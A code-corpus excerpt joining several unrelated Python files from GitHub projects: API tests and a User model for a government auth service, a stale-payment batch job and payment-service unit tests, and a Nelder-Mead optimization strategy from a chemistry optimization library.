'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 200, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['party_guid'] == TEST_PARTY_PER_GUID_3
def test_post_permittee_permit_guid_not_found(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'permit_guid': TEST_MINE_GUID,
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_post_permittee_party_guid_not_found(test_client, auth_headers):
data = {
'party_guid': TEST_MINE_GUID,
'mine_party_appt_guid': TEST_PERMITTEE_GUID,
'related_guid': TEST_PERMIT_GUID_1,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
post_resp = test_client.post(
'/parties/mines', data=data, headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 400, str(post_resp.response)
post_data = json.loads(post_resp.data.decode())
assert post_data['error']['message']
def test_put_permittee_permittee_guid_not_found(test_client, auth_headers):
data = {
'party_guid': TEST_PARTY_PER_GUID_3,
'related_guid': TEST_PERMIT_GUID_1,
'effective_date': datetime.today().strftime("%Y-%m-%d")
}
put_resp = test_client.put(
'/parties/' + NON_EXISTENT_GUID, data=data, headers=auth_headers['full_auth_header'])
assert put_resp.status_code == 404, str(put_resp.response)
put_data = json.loads(put_resp.data.decode())
assert put_data['error']['message']
```
|
{
"source": "jeznorth/sbc-auth",
"score": 2
}
|
#### File: auth_api/models/user.py
```python
import datetime
from flask import current_app
from sqlalchemy import Boolean, Column, ForeignKey, Integer, String, or_
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
from auth_api.utils.roles import Status, UserStatus
from .base_model import BaseModel
from .db import db
from .membership import Membership as MembershipModel
from .org import Org as OrgModel
from .user_status_code import UserStatusCode
class User(BaseModel):
"""This is the model for a User."""
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column('username', String(100), index=True)
firstname = Column('first_name', String(200), index=True)
lastname = Column('last_name', String(200), index=True)
email = Column('email', String(200), index=True)
keycloak_guid = Column(
'keycloak_guid', UUID(as_uuid=True), unique=True, nullable=False
)
roles = Column('roles', String(1000))
contacts = relationship('ContactLink', back_populates='user', primaryjoin='User.id == ContactLink.user_id')
orgs = relationship('Membership', back_populates='user',
primaryjoin='and_(User.id == Membership.user_id, \
or_(Membership.status == ' + str(Status.ACTIVE.value) + ', Membership.status == ' + str(
Status.PENDING_APPROVAL.value) + '))') # noqa:E127
is_terms_of_use_accepted = Column(Boolean(), default=False, nullable=True)
terms_of_use_accepted_version = Column(
ForeignKey('documents.version_id'), nullable=True
)
terms_of_use_version = relationship('Documents', foreign_keys=[terms_of_use_accepted_version], uselist=False,
lazy='select')
status = Column(
ForeignKey('user_status_code.id')
)
user_status = relationship('UserStatusCode', foreign_keys=[status], lazy='subquery')
@classmethod
def find_by_username(cls, username):
"""Return the first user with the provided username."""
return cls.query.filter_by(username=username).first()
@classmethod
def find_by_jwt_token(cls, token: dict):
"""Find an existing user by the keycloak GUID in the provided token."""
return cls.query.filter_by(
keycloak_guid=token.get('sub', None)
).one_or_none()
@classmethod
def create_from_jwt_token(cls, token: dict):
"""Create a User from the provided JWT."""
if token:
user = User(
username=token.get('preferred_username', None),
firstname=token.get('firstname', None),
lastname=token.get('lastname', None),
email=token.get('email', None),
keycloak_guid=token.get('sub', None),
created=datetime.datetime.now(),
roles=token.get('roles', None)
)
current_app.logger.debug(
'Creating user from JWT:{}; User:{}'.format(token, user)
)
user.status = UserStatusCode.get_default_type()
user.save()
return user
return None
@classmethod
def update_from_jwt_token(cls, token: dict, user):
"""Update a User from the provided JWT."""
if token:
if user:
user.username = token.get('preferred_username', user.username)
user.firstname = token.get('firstname', user.firstname)
user.lastname = token.get('lastname', user.lastname)
user.email = token.get('email', user.email)
user.modified = datetime.datetime.now()
user.roles = token.get('roles', user.roles)
current_app.logger.debug(
'Updating user from JWT:{}; User:{}'.format(token, user)
)
# If this user is marked as Inactive, this login will re-activate them
user.status = UserStatus.ACTIVE.value
cls.commit()
return user
return None
@classmethod
def find_users(cls, first_name, last_name, email):
"""Return a set of users with either the given username or the given email."""
# TODO: This needs to be improved for scalability. Paging large datasets etc.
if first_name == '' and last_name == '' and email == '':
return cls.query.all()
return cls.query.filter(or_(cls.firstname == first_name, cls.lastname == last_name, cls.email == email)).all()
@classmethod
def update_terms_of_use(cls, token: dict, is_terms_accepted, terms_of_use_version):
"""Update the terms of service for the user."""
if token:
user = cls.find_by_jwt_token(token)
user.is_terms_of_use_accepted = is_terms_accepted
user.terms_of_use_accepted_version = terms_of_use_version
current_app.logger.debug(
'Updating users Terms of use is_terms_accepted:{}; terms_of_use_version:{}'.format(
is_terms_accepted, terms_of_use_version)
)
cls.commit()
return user
return None
@classmethod
def find_users_by_org_id_by_status_by_roles(cls, org_id, roles, status=Status.ACTIVE.value):
"""Find all members of the org with a status."""
return db.session.query(User). \
join(MembershipModel,
(User.id == MembershipModel.user_id) & (MembershipModel.status == status) &
(MembershipModel.membership_type_code.in_(roles))). \
join(OrgModel).filter(OrgModel.id == org_id).all()
def delete(self):
"""Users cannot be deleted so intercept the ORM by just returning."""
return self
```
|
{
"source": "jeznorth/sbc-pay",
"score": 2
}
|
#### File: jobs/update-stale-payment/update_stale_payment_records.py
```python
import datetime
import os
import sentry_sdk
from sentry_sdk.integrations.flask import FlaskIntegration
from flask import Flask
from flask_jwt_oidc import JwtManager
from pay_api.exceptions import BusinessException
from pay_api.models import PaymentTransaction as PaymentTransactionModel
from pay_api.models import Payment as PaymentModel
from pay_api.models import db, ma
from pay_api.services import TransactionService
from pay_api.services import PaymentService
from utils.logging import setup_logging
import config
setup_logging(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'logging.conf')) # important to do this first
# lower case name as used by convention in most Flask apps
jwt = JwtManager() # pylint: disable=invalid-name
def create_app(run_mode=os.getenv('FLASK_ENV', 'production')):
"""Return a configured Flask App using the Factory method."""
app = Flask(__name__)
app.config.from_object(config.CONFIGURATION[run_mode])
# Configure Sentry
if app.config.get('SENTRY_DSN', None): # pragma: no cover
sentry_sdk.init(
dsn=app.config.get('SENTRY_DSN'),
integrations=[FlaskIntegration()]
)
db.init_app(app)
ma.init_app(app)
setup_jwt_manager(app, jwt)
register_shellcontext(app)
return app
def setup_jwt_manager(app, jwt_manager):
"""Use flask app to configure the JWTManager to work for a particular Realm."""
def get_roles(a_dict):
return a_dict['realm_access']['roles'] # pragma: no cover
app.config['JWT_ROLE_CALLBACK'] = get_roles
jwt_manager.init_app(app)
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {
'app': app,
'jwt': jwt} # pragma: no cover
app.shell_context_processor(shell_context)
def run():
application = create_app()
application.logger.debug('Ran Batch Job--')
application.app_context().push()
update_stale_payments(application)
delete_marked_payments(application)
def update_stale_payments(app):
"""Update stale payment records.
This is to handle edge cases where the user has completed payment and some error occured and payment status is not up-to-date.
"""
stale_transactions = PaymentTransactionModel.find_stale_records(minutes=30)
if len(stale_transactions) == 0:
app.logger.info(f'Stale Transaction Job Ran at {datetime.datetime.now()}.But No records found!')
for transaction in stale_transactions:
try:
app.logger.info(
'Stale Transaction Job found records.Payment Id: {}, Transaction Id : {}'.format(transaction.payment_id,
transaction.id))
TransactionService.update_transaction(transaction.payment_id, transaction.id, '')
app.logger.info(
'Stale Transaction Job Updated records.Payment Id: {}, Transaction Id : {}'.format(
transaction.payment_id, transaction.id))
except BusinessException as err: # just catch and continue .Don't stop
app.logger.error('Stale Transaction Error on update_transaction')
app.logger.error(err)
def delete_marked_payments(app):
"""Update stale payment records.
This is to handle edge cases where the user has completed payment and some error occured and payment status is not up-to-date.
"""
payments_to_delete = PaymentModel.find_payments_marked_for_delete()
if len(payments_to_delete) == 0:
app.logger.info(f'Delete Payment Job Ran at {datetime.datetime.now()}.But No records found!')
for payment in payments_to_delete:
try:
app.logger.info('Delete Payment Job found records.Payment Id: {}'.format(payment.id))
PaymentService.delete_payment(payment.id)
app.logger.info(
'Delete Payment Job Updated records.Payment Id: {}'.format(payment.id))
except BusinessException as err: # just catch and continue .Don't stop
app.logger.error('Error on delete_payment')
app.logger.error(err)
if __name__ == "__main__":
run()
```
#### File: unit/api/test_statement_settings.py
```python
import json
from datetime import timedelta
from pay_api.models import BcolPaymentAccount
from pay_api.models.payment import Payment
from pay_api.models.payment_account import PaymentAccount
from pay_api.utils.enums import StatementFrequency
from pay_api.utils.util import current_local_time, get_first_and_last_dates_of_month, get_week_start_and_end_date
from tests.utilities.base_test import (
get_claims, token_header, get_payment_request)
def test_get_default_statement_settings_weekly(session, client, jwt, app):
"""Assert that the default statement setting is weekly."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/payment-requests', data=json.dumps(get_payment_request(business_identifier='CP0002000')),
headers=headers)
payment: Payment = Payment.find_by_id(rv.json.get('id'))
bcol_account: BcolPaymentAccount = BcolPaymentAccount.find_by_id(payment.invoices[0].bcol_account_id)
pay_account: PaymentAccount = PaymentAccount.find_by_id(bcol_account.account_id)
rv = client.get(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings',
headers=headers)
assert rv.status_code == 200
assert rv.json.get('frequency') == StatementFrequency.WEEKLY.value
def test_post_default_statement_settings_daily(session, client, jwt, app):
"""Assert that the post endpoint works."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/payment-requests', data=json.dumps(get_payment_request(business_identifier='CP0002000')),
headers=headers)
payment: Payment = Payment.find_by_id(rv.json.get('id'))
bcol_account: BcolPaymentAccount = BcolPaymentAccount.find_by_id(payment.invoices[0].bcol_account_id)
pay_account: PaymentAccount = PaymentAccount.find_by_id(bcol_account.account_id)
rv = client.get(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings', data=json.dumps({}),
headers=headers)
assert rv.status_code == 200
assert rv.json.get('frequency') == StatementFrequency.WEEKLY.value
# Set the frequency to Daily and assert
daily_frequency = {'frequency': 'DAILY'}
rv = client.post(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings',
data=json.dumps(daily_frequency),
headers=headers)
assert rv.json.get('frequency') == StatementFrequency.DAILY.value
end_date = get_week_start_and_end_date()[1]
assert rv.json.get('fromDate') == (end_date + timedelta(days=1)).strftime('%Y-%m-%d')
# Set the frequency to Monthly and assert
daily_frequency = {'frequency': 'MONTHLY'}
rv = client.post(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings',
data=json.dumps(daily_frequency),
headers=headers)
end_date = get_first_and_last_dates_of_month(current_local_time().month, current_local_time().year)[1]
assert rv.json.get('frequency') == StatementFrequency.MONTHLY.value
assert rv.json.get('fromDate') == (end_date + timedelta(days=1)).strftime('%Y-%m-%d')
# Get the latest frequency
rv = client.get(f'/api/v1/accounts/{pay_account.auth_account_id}/statements/settings', data=json.dumps({}),
headers=headers)
assert rv.status_code == 200
assert rv.json.get('frequency') == StatementFrequency.MONTHLY.value
```
#### File: unit/services/test_payment_service.py
```python
from unittest.mock import patch
import pytest
from flask import current_app
from requests.exceptions import ConnectionError, ConnectTimeout, HTTPError
from pay_api.exceptions import BusinessException, ServiceUnavailableException
from pay_api.models import CreditPaymentAccount, FeeSchedule, InternalPaymentAccount, Payment
from pay_api.services.payment_service import PaymentService
from pay_api.utils.enums import PaymentStatus, TransactionStatus, InvoiceStatus, PaymentMethod
from tests.utilities.base_test import (
factory_invoice, factory_invoice_reference, factory_payment, factory_payment_account, factory_payment_line_item,
factory_payment_transaction, get_auth_basic_user, get_auth_premium_user, get_payment_request,
get_payment_request_with_payment_method, get_zero_dollar_payment_request)
test_user_token = {'preferred_username': 'test'}
def test_create_payment_record(session, public_user_mock):
"""Assert that the payment records are created."""
payment_response = PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
# Create another payment with same request, the account should be the same
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
assert account_id == account_model.id
def test_create_payment_record_with_direct_pay(session, public_user_mock):
"""Assert that the payment records are created."""
current_app.config['DIRECT_PAY_ENABLED'] = True
payment_response = PaymentService.create_payment(
get_payment_request(), get_auth_basic_user(PaymentMethod.DIRECT_PAY.value))
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
# Create another payment with same request, the account should be the same
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'CP',
get_auth_basic_user().get('account').get('id'))
assert account_id == account_model.id
def test_create_payment_record_rollback(session, public_user_mock):
"""Assert that the payment records are created."""
# Mock here that the invoice update fails here to test the rollback scenario
with patch('pay_api.services.invoice.Invoice.flush', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment.Payment.create', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.paybc_service.PaybcService.create_invoice', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
def test_update_payment_record(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
payment_response = PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert payment_response.get('id') is not None
def test_update_payment_record_transaction_invalid(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id, TransactionStatus.COMPLETED.value)
transaction.save()
payment_response = PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert payment_response.get('id') is not None
def test_update_payment_completed_invalid(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.payment_status_code = PaymentStatus.COMPLETED.value
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
with pytest.raises(BusinessException) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == BusinessException
def test_update_payment_deleted_invalid(session, public_user_mock):
"""Assert that the payment records are not updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.payment_status_code = PaymentStatus.DELETED.value
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
with pytest.raises(BusinessException) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == BusinessException
def test_update_payment_invoice_deleted_invalid(session, public_user_mock):
"""Assert that the payment records are not updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.invoice_status_code = InvoiceStatus.DELETED.value
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
payment_response = PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert payment_response.get('id') is not None
def test_update_payment_record_rollback(session, public_user_mock):
"""Assert that the payment records are updated."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
# Mock here that the invoice update fails here to test the rollback scenario
with patch(
'pay_api.services.payment_transaction.PaymentTransaction.find_active_by_payment_id',
side_effect=Exception('mocked error'),
):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch(
'pay_api.services.payment_transaction.PaymentTransaction.update_transaction',
side_effect=Exception('mocked error'),
):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment.Payment.find_by_id', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment_line_item.PaymentLineItem.create', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
# reset transaction
transaction = factory_payment_transaction(payment.id)
transaction.save()
with patch('pay_api.services.paybc_service.PaybcService.update_invoice', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
# reset transaction
transaction = factory_payment_transaction(payment.id)
transaction.save()
with patch('pay_api.services.invoice.Invoice.find_by_id', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
# reset transaction
transaction = factory_payment_transaction(payment.id)
transaction.save()
with patch('pay_api.services.invoice.Invoice.flush', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
with patch('pay_api.services.payment.Payment.save', side_effect=Exception('mocked error')):
with pytest.raises(Exception) as excinfo:
PaymentService.update_payment(payment.id, get_payment_request(), get_auth_basic_user())
assert excinfo.type == Exception
def test_create_payment_record_rollback_on_paybc_connection_error(session, public_user_mock):
"""Assert that the payment records are not created."""
# Mock here that the invoice update fails here to test the rollback scenario
with patch('pay_api.services.oauth_service.requests.post', side_effect=ConnectionError('mocked error')):
with pytest.raises(ServiceUnavailableException) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == ServiceUnavailableException
with patch('pay_api.services.oauth_service.requests.post', side_effect=ConnectTimeout('mocked error')):
with pytest.raises(ServiceUnavailableException) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == ServiceUnavailableException
with patch('pay_api.services.oauth_service.requests.post', side_effect=HTTPError('mocked error')) as post_mock:
post_mock.status_Code = 503
with pytest.raises(HTTPError) as excinfo:
PaymentService.create_payment(get_payment_request(), get_auth_basic_user())
assert excinfo.type == HTTPError
def test_create_zero_dollar_payment_record(session, public_user_mock):
"""Assert that the payment records are created and completed."""
payment_response = PaymentService.create_payment(get_zero_dollar_payment_request(), get_auth_basic_user())
account_model = InternalPaymentAccount.find_by_corp_number_and_corp_type_and_account_id('CP0001234', 'CP',
get_auth_basic_user().get(
'account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
assert payment_response.get('status_code') == 'COMPLETED'
# Create another payment with same request, the account should be the same
PaymentService.create_payment(get_zero_dollar_payment_request(), get_auth_basic_user())
account_model = InternalPaymentAccount.find_by_corp_number_and_corp_type_and_account_id('CP0001234', 'CP',
get_auth_basic_user().get(
'account').get('id'))
assert account_id == account_model.id
assert payment_response.get('status_code') == 'COMPLETED'
def test_delete_payment(session, auth_mock, public_user_mock):
"""Assert that the payment records are soft deleted."""
payment_account = factory_payment_account()
payment = factory_payment()
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
PaymentService.delete_payment(payment.id)
payment = Payment.find_by_id(payment.id)
assert payment.payment_status_code == PaymentStatus.DELETED.value
assert payment.invoices[0].invoice_status_code == InvoiceStatus.DELETED.value
def test_delete_completed_payment(session, auth_mock):
"""Assert that the payment records are soft deleted."""
payment_account = factory_payment_account()
payment = factory_payment(payment_status_code=PaymentStatus.COMPLETED.value)
payment_account.save()
payment.save()
invoice = factory_invoice(payment, payment_account)
invoice.save()
factory_invoice_reference(invoice.id).save()
fee_schedule = FeeSchedule.find_by_filing_type_and_corp_type('CP', 'OTANN')
line = factory_payment_line_item(invoice.id, fee_schedule_id=fee_schedule.fee_schedule_id)
line.save()
transaction = factory_payment_transaction(payment.id)
transaction.save()
with pytest.raises(Exception) as excinfo:
PaymentService.delete_payment(payment.id)
assert excinfo.type == BusinessException
def test_create_bcol_payment(session, public_user_mock):
"""Assert that the payment records are created."""
payment_response = PaymentService.create_payment(
get_payment_request_with_payment_method(payment_method='DRAWDOWN', business_identifier='CP0002000'),
get_auth_premium_user())
assert payment_response is not None
assert payment_response.get('payment_system') == 'BCOL'
assert payment_response.get('status_code') == 'COMPLETED'
def test_create_payment_record_with_service_charge(session, public_user_mock):
"""Assert that the payment records are created."""
# Create a payment request for corp type BC
payment_response = PaymentService.create_payment(get_payment_request(corp_type='BC', second_filing_type='OTFDR'),
get_auth_basic_user())
account_model = CreditPaymentAccount. \
find_by_corp_number_and_corp_type_and_auth_account_id('CP0001234', 'BC',
get_auth_basic_user().get('account').get('id'))
account_id = account_model.id
assert account_id is not None
assert payment_response.get('id') is not None
assert payment_response.get('invoices')[0].get('service_fees') == 1.50
```
|
{
"source": "jezsadler/summit",
"score": 3
}
|
#### File: summit/summit/__init__.py
```python
import pathlib
import shutil
def get_summit_config_path(config_dir_name=".summit"):
"""Returns the path to the summit config directory"""
home = pathlib.Path.home()
return home / config_dir_name
def clean_house(config_dir_name=".summit"):
"""This removes all the temporary files stored in the config directory"""
config_path = get_summit_config_path(config_dir_name)
shutil.rmtree(config_path)
from summit.domain import *
from summit.experiment import Experiment
from summit.run import Runner, NeptuneRunner
from summit.strategies import *
```
#### File: summit/strategies/neldermead.py
```python
from .base import Strategy, Transform
from summit.domain import *
from summit.domain import Domain
from summit.utils.dataset import DataSet
from summit.utils import jsonify_dict, unjsonify_dict
import numpy as np
import pandas as pd
from scipy.optimize import OptimizeResult
class NelderMead(Strategy):
"""Nelder-Mead Simplex
A reimplementation of the Nelder-Mead Simplex method adapted for sequential calls.
This includes adaptions in terms of reflecting points, dimension reduction and dimension recovery
proposed by Cortes-Borda et al.
Parameters
----------
domain : :class:`~summit.domain.Domain`
The domain of the optimization
transform : :class:`~summit.strategies.base.Transform`, optional
A transform object. By default no transformation will be done
on the input variables or objectives.
random_start : bool, optional
Whether to start at a random point or the value specified by x_start
adaptive : bool, optional
Adapt algorithm parameters to dimensionality of problem. Useful for
high-dimensional minimization. Default is False.
x_start: array_like of shape (1, N), optional
Initial center point of simplex
Default: empty list that will initialize generation of x_start as geoemetrical center point of bounds
Note that x_start is ignored when initial call of suggest_exp contains prev_res and/or prev_param
dx: float, optional
Parameter for stopping criterion: two points are considered
to be different if they differ by at least dx(i) in at least one
coordinate i.
Default is 1E-5.
df: float, optional
Parameter for stopping criterion: two function values are considered
to be different if they differ by at least df.
Default is 1E-5.
Notes
-----
This is inspired by the work by [Cortés-Borda]_. Implementation partly follows the Nelder-Mead Simplex
implementation in `scipy-optimize <https://github.com/scipy/scipy/blob/master/scipy/optimize/optimize.py>`_
After the initialisation, the number of suggested experiments depends on the internal state of Nelder Mead.
Usually the algorithm requests 1 point per iteration, e.g., a reflection.
In some cases it requests more than 1 point, e.g., for shrinking the simplex.
References
----------
.. [Cortés-Borda] <NAME>.; <NAME>.; <NAME>.; <NAME>.; <NAME>.;
Truchet, C.; <NAME>.; <NAME>. Optimizing the Heck–Matsuda Reaction
in Flow with a Constraint-Adapted Direct Search Algorithm.
Organic ProcessResearch & Development 2016,20, 1979–1987
Examples
--------
>>> from summit.domain import Domain, ContinuousVariable
>>> from summit.strategies import NelderMead
>>> domain = Domain()
>>> domain += ContinuousVariable(name='temperature', description='reaction temperature in celsius', bounds=[0, 1])
>>> domain += ContinuousVariable(name='flowrate_a', description='flow of reactant a in mL/min', bounds=[0, 1])
>>> domain += ContinuousVariable(name='yield', description='relative conversion to xyz', bounds=[0,100], is_objective=True, maximize=True)
>>> strategy = NelderMead(domain)
>>> next_experiments = strategy.suggest_experiments()
>>> print(next_experiments)
NAME temperature flowrate_a strategy
TYPE DATA DATA METADATA
0 0.500 0.500 Nelder-Mead Simplex
1 0.625 0.500 Nelder-Mead Simplex
2 0.500 0.625 Nelder-Mead Simplex
"""
def __init__(self, domain: Domain, transform: Transform = None, **kwargs):
Strategy.__init__(self, domain, transform, **kwargs)
self._x_start = kwargs.get("x_start", [])
self.random_start = kwargs.get("random_start", False)
self._dx = kwargs.get("dx", 1e-5)
self._df = kwargs.get("df", 1e-5)
self._adaptive = kwargs.get("adaptive", False)
self.prev_param = None
def suggest_experiments(self, prev_res: DataSet = None, **kwargs):
"""Suggest experiments using Nelder-Mead Simplex method
Parameters
----------
prev_res: summit.utils.data.DataSet, optional
Dataset with data from previous experiments.
If no data is passed, the Nelder-Mead optimization algorithm
will be initialized and suggest initial experiments.
Returns
-------
next_experiments: DataSet
A `Dataset` object with the suggested experiments by Nelder-Mead Simplex algorithm
Notes
------
After the initialisation, the number of suggested experiments depends on the internal state of Nelder Mead.
Usually the algorithm requests 1 point per iteration, e.g., a reflection.
In some cases it requests more than 1 point, e.g., for shrinking the simplex.
Thus, there is no `num_experiments` keyword argument.
"""
# get objective name and whether optimization is maximization problem
obj_name = None
obj_maximize = False
for v in self.domain.variables:
i = 0
if v.is_objective:
i += 1
if i > 1:
raise ValueError(
"Nelder-Mead is not able to optimize multiple objectives."
)
obj_name = v.name
if v.maximize:
obj_maximize = True
# get results from conducted experiments
if prev_res is not None:
prev_res = prev_res
# get parameters from previous iterations
inner_prev_param = None
if self.prev_param is not None:
# get parameters for Nelder-Mead from previous iterations
inner_prev_param = self.prev_param[0]
# recover invalid experiments from previous iteration
if self.prev_param[1] is not None:
invalid_res = self.prev_param[1].drop(("constraint", "DATA"), 1)
prev_res = pd.concat([prev_res, invalid_res])
## Generation of new suggested experiments.
# An inner function is called loop-wise to get valid experiments and
# avoid suggestions of experiments that violate constraints.
# If no valid experiment is found after #<inner_iter_tol>, an error is raised.
inner_iter_tol = 5
c_iter = 0
valid_next_experiments = False
next_experiments = None
while not valid_next_experiments and c_iter < inner_iter_tol:
valid_next_experiments = False
next_experiments, xbest, fbest, param = self._inner_suggest_experiments(
prev_res=prev_res, prev_param=inner_prev_param
)
# Invalid experiments hidden from data returned to user but stored internally in param
invalid_experiments = next_experiments.loc[
next_experiments[("constraint", "DATA")] == False
]
next_experiments = next_experiments.loc[
next_experiments[("constraint", "DATA")] != False
]
prev_res = prev_res
if len(next_experiments) and len(invalid_experiments):
valid_next_experiments = True
if obj_maximize:
invalid_experiments[(obj_name, "DATA")] = float("-inf")
else:
invalid_experiments[(obj_name, "DATA")] = float("inf")
#
elif len(invalid_experiments):
if obj_maximize:
invalid_experiments[(obj_name, "DATA")] = float("-inf")
else:
invalid_experiments[(obj_name, "DATA")] = float("inf")
prev_res = invalid_experiments
else:
valid_next_experiments = True
inner_prev_param = param
param = [param, invalid_experiments]
c_iter += 1
if c_iter >= inner_iter_tol:
raise ValueError(
"No new points found. Internal stopping criterion is reached."
)
# return only valid experiments (invalid experiments are stored in param[1])
next_experiments = next_experiments.drop(("constraint", "DATA"), 1)
objective_dir = -1.0 if obj_maximize else 1.0
self.fbest = objective_dir * fbest
